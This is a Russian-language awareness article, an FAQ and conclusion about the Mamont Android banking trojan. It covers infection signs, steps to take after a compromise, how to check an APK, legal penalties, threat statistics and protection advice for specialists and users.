Часто задаваемые вопросы
Что такое троян Mamont простыми словами?
Mamont — это вредоносная программа для Android, которая маскируется под легитимные приложения (трекеры посылок, обновления системы, просмотрщики фото). После установки она перехватывает SMS-сообщения, крадёт контакты и помогает мошенникам получить доступ к вашему банковскому счёту. Название происходит от жаргона мошенников, которые называют своих жертв "мамонтами".
Как понять, что мой телефон заражён Mamont?
Основные признаки заражения: быстрая разрядка батареи, появление приложения, которое вы не устанавливали, непрочитанные SMS пропадают сами собой, необъяснимые списания со счёта, устройство "тормозит" без причины, появление постоянного уведомления об "обновлениях" которое нельзя закрыть. Если заметили хотя бы 2-3 признака — немедленно отключите интернет и обратитесь к специалистам.
Можно ли заразиться Mamont через Google Play?
В большинстве случаев нет. Google Play имеет систему защиты Play Protect, которая сканирует приложения. Mamont распространяется через прямые ссылки на APK-файлы в мессенджерах, фейковых сайтах и email. Однако были единичные случаи, когда поддельные приложения проникали в Play Store, но Google оперативно удаляет их. Всегда проверяйте разработчика приложения и читайте отзывы.
Что делать если случайно установил подозрительное приложение?
Немедленно: 1) Включите режим полёта, 2) Позвоните в банк с другого телефона и заблокируйте карты, 3) НЕ удаляйте приложение сразу — сначала сохраните доказательства, 4) Обратитесь в полицию, 5) После разбирательства сделайте полный сброс устройства к заводским настройкам, 6) Смените все пароли. Важно: не пытайтесь просто удалить приложение — троян может оставить скрытые компоненты.
Защищает ли антивирус от Mamont?
Современные антивирусы (Kaspersky, Dr.Web, ESET) распознают известные версии Mamont, но проблема в том, что мошенники создают уникальные варианты трояна для каждой атаки с помощью нейросетей. Антивирус должен быть частью защиты, но не единственной мерой. Важнее — бдительность: не устанавливать APK из подозрительных источников, проверять разрешения приложений, использовать двухфакторную аутентификацию.
Могут ли iPhone заразиться Mamont?
На январь 2026 года Mamont работает только на Android. Для iPhone существуют аналогичные угрозы, но они редки из-за закрытой экосистемы iOS. Однако эксперты прогнозируют появление iOS-версий через enterprise certificates. Владельцам iPhone всё равно нужно быть осторожными с фишинговыми ссылками, поддельными профилями конфигурации и подозрительными запросами на установку приложений вне App Store.
Можно ли восстановить украденные деньги?
Частично возможно, если действовать быстро. Шансы зависят от: 1) Скорости обращения в банк (в первые часы больше шансов), 2) Наличия доказательств мошенничества, 3) Того, успели ли мошенники вывести деньги через криптообменники. Сразу обращайтесь в банк для блокировки операций, в полицию для возбуждения уголовного дела. Банки обязаны расследовать подозрительные операции, но это может занять до 30 дней.
Как проверить приложение на вредоносность перед установкой?
Используйте сервис VirusTotal.com: 1) Если файл уже скачан — загрузите APK на сайт, 2) Если есть только ссылка — вставьте URL для проверки, 3) Дождитесь сканирования 70+ антивирусами, 4) Если хотя бы 5-10 антивирусов нашли угрозу — УДАЛИТЬ. Также проверьте: название файла (нет ли двойного расширения .pdf.apk), размер (слишком маленький <>Почему банки не защищают от таких атак?
Банки защищают, но Mamont обходит многие защиты: 1) Банковское приложение само по себе безопасно, 2) Mamont крадёт SMS-коды, которые банк отправляет ВАМ, 3) Мошенники действуют от вашего имени с вашего устройства, 4) Для банка операция выглядит легитимной. Решение: многофакторная аутентификация (не только SMS), биометрия, лимиты на переводы, подтверждение через звонок оператору для крупных сумм.
Есть ли ответственность за распространение Mamont?
Да, уголовная ответственность по статье 159.6 УК РФ (мошенничество в сфере компьютерной информации) — до 10 лет лишения свободы. Также возможны обвинения по статьям: 272 УК (неправомерный доступ к компьютерной информации), 273 УК (создание вредоносных программ), 210 УК (организованная группа). В 2025-2026 годах МВД активно раскрывает группировки, работающие с Mamont, и сроки реальные.
Заключение: что ждёт нас в 2026 году
Схема "Мамонт" 2.0 — это не просто очередная киберугроза. Это новая реальность, в которой злоумышленники используют передовые технологии (нейросети, Telegram-боты, автоматизацию) для массовых атак на российских пользователей Android.
Ключевые выводы:
1. Масштаб угрозы критический
- 47% всех заражённых Android-устройств в России
- ~700,000 инфицированных смартфонов
- Ущерб превысил 150 млн рублей только в ноябре 2025
- Рост заражений: +36 раз по сравнению с 2024
2. Троян эволюционирует быстрее защиты
- ИИ-генерация уникальных версий за минуты
- Модульная архитектура (SMS + NFC + Keylogger)
- Обход signature-based детектирования
- Новые векторы распространения каждую неделю
3. Социальная инженерия — главное оружие
- Эмоциональное давление (срочность, выгода, страх)
- Маскировка под легитимные сервисы
- Использование доверия (домовые чаты, знакомые)
- Адаптация под текущие события (СВО, праздники)
4. Защита требует комплексного подхода
- Технические меры (MDM, MTD, antivirus)
- Обучение и осведомлённость
- Процессы реагирования на инциденты
- Постоянный мониторинг
Прогноз на 2026 год:
Тенденции развития Mamont:
- Появление iOS-версий через enterprise certificates
- Интеграция с deepfake для голосовых атак
- Атаки на IoT-устройства и умные дома
- Таргетированные корпоративные кампании
- Использование уязвимостей в 5G-сетях
Контрмеры индустрии:
- Обновление Google Play Protect с ML-детектированием
- Банки внедряют поведенческую биометрию
- Telegram добавляет предупреждения о подозрительных файлах
- МВД создаёт специализированные подразделения
- ЦБ РФ вводит обязательные лимиты на переводы
Рекомендации для специалистов:
Форензик-экспертам:
- Изучайте новые версии Mamont — они появляются еженедельно
- Обменивайтесь IoC с коллегами
- Используйте ML-модели для детектирования
- Документируйте каждый кейс для базы знаний
IT-специалистам:
- Внедряйте MDM/MTD в компаниях
- Настраивайте мониторинг аномалий
- Проводите регулярные security awareness тренинги
- Тестируйте incident response планы
Обычным пользователям:
- Никогда не устанавливайте APK из мессенджеров
- Проверяйте каждое разрешение приложения
- Используйте антивирус и держите его обновлённым
- При малейшем подозрении — обращайтесь к специалистам
Заключительное слово:
Схема "Мамонт" — это напоминание о том, что в цифровом мире бдительность должна быть постоянной. Технологии развиваются, но человеческий фактор остаётся слабым звеном. Образование, осведомлённость и правильные технические меры — вот триада защиты в 2026 году.
Помните: лучшая защита от Mamont — это профилактика. Не становитесь "мамонтом" для мошенников.
Полезные ресурсы:
- МВД России — Киберполиция
- Лаборатория Касперского — Threat Intelligence
- F6 — Отчёты о мобильных угрозах
- Банк России — Информационная безопасность
- ForensicAnvil.ru — Форум по форензике
